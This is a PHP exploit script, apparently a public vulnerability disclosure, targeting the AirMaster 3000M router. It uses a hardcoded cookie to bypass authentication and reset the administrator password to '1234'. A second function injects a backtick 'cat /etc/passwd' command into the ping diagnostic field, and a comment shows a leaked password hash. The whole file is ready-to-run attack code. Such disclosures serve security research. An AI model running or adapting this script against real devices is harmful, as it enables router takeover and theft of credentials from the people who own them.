<?php
# Exploit Title: AirMaster 3000M multiple Vulnerabilities
# Date: 2017/08/12
# Exploit Author: Koorosh Ghorbani
# Author Homepage: http://8thbit.net/
# Vendor Homepage: http://mobinnet.ir/
# Software Version: V2.0.1B1044
# Web Server: GoAhead-Webs/2.5.0
define('isDebug',false);
define('specialCookie','Cookie: kz_userid=Administrator:1'); //Special Cookie which allow us to execute commands without authentication
function changePassword(){
$pw = "1234"; //New Password
$data = "admuser=Administrator&admpass=$pw&admConfirmPwd=$pw" ;
$ch = curl_init('http://192.168.1.1/goform/setSysAdm');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
if($response == "success"){
echo "New Password is : $pw\r\n";
}else{
echo "Failed\r\n";
}
if (isDebug){
echo $response;
}
}
function executeCommand(){
$data = "pingAddr=`cat /etc/passwd`";
$ch = curl_init('http://192.168.1.1/goform/startPing');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
specialCookie,
'Origin: http://192.168.1.1',
'Content-Type: application/x-www-form-urlencoded',
"X-Requested-With: XMLHttpRequest",
"Referer: http://192.168.1.1/diagnosis_ping.asp"
));
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$response = curl_exec($ch);
echo $response; //ping: bad address 'admin:XGUaznXz1ncKw:0:0:Adminstrator:/:/bin/sh'
}
changePassword();
